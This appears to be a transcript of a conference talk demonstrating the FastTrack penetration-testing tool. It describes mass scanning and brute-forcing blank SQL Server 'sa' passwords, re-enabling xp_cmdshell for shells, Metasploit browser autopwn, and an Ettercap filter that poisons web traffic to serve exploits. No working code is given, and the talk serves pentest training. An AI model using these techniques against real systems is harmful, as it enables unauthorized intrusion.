What I'm going to do now is show you some nice little functionality features of FastTrack that you guys can see out there. It's pretty neat stuff. It is on the BackTrack CD. You can also download it. I have written a bunch of installers for it, as well as a Gentoo installer and also a vanilla installer, so if you're using, you know, something out there like Slackware or anything else, it automatically detects it and installs it for you. Oh, in addition, these attacks that we demonstrated here are no different on a Windows Server 2008 box using SQL Server 2008. We have successfully tested it on that as well, and we're actually able to get Meterpreter to work no problem, so that was a pretty cool and interesting find that we did see. So, you know, Server 2008, SQL Server 2008, not a big deal.

Alright, so what we're going to do is a little FastTrack here real quick. We use the GUI. And I can't use the GUI because I did write it, so don't catch me. I'm just using a Windows 2000 server because it's the only one that I did have, but it does some pretty cool stuff. If you look here, here's my address, 55.6. You do things like, if anybody's familiar with the autopwn feature in Metasploit, you know, you have to type in all those commands like db_create, you know, db_nmap. So I kind of automated that real quick, and we'll just do a quick port scan of that. Port 135, 445, 10.201.55.6. And all you do is hit enter. It's automatic and does everything for ya. It automatically port scans it; since the host is down, let me do a -PN real quick. It does really work, I swear. Alright, so we'll move on to SQL Bruter.
So for those of you that are doing pen tests, our main point of entry when we go into companies, and it's so simple, is companies that, especially those that load thin clients through SQL, install SQL Server 2000 or 2005. They put blank passwords or really easily guessable passwords on port 1433. The sa password is blank by default in 2000 and earlier, FYI. So I mean what we do is we just do mass scans in FastTrack, and you can just do subnet ranges to test for these, and it looks for sa accounts and automatically brute forces them and gives you shells back to them. So you can see here the following SQL Servers were compromised. They found a blank password; which one do you want to jump into? Jumping into a shell. Now if you're using SQL Server 2005, it automatically detects if it's disabled and re-enables xp_cmdshell for ya. It gets ya full access back into it again. So it gets ya full root compromise on that.

Now what's been incorporated is the new Metasploit feature, which is from egypt, the browser autopwn feature, where it sets up a fake web server for you, and then as soon as someone connects to you it automatically starts running a brute force of exploits against the system. It's kind of like Impact on steroids. What we're working on here, and it's going to be released in the next FastTrack version, is we wrote a custom Ettercap filter, and what it does is it poisons all traffic going out on 80, and as soon as someone goes to browse the website it automatically redirects to you and it's doing a whole bunch of attacks against ya. It should be pretty slick. So we're listening on our specific port, and what it's doing is it's loading the Meterpreter session right here, and so all we need to do is have someone connect to us on 80. And so in an Ettercap type of attack it would definitely do that. And everything breaks for the demonstration. We were on a t-shirt so that's our last call. Who wants a lemon? I'll take hers.
All right guys, that was it for us. I appreciate your time and that's all we got. Thanks. One last thing to mention. The SA Exploiter tool can be run on Linux. Use Wine or something like that. And Dave, where can we get these tools? So if you go to our main website, security.com, there's a free tool section on the very bottom there. It should be available tonight. Thanks guys, I appreciate your time.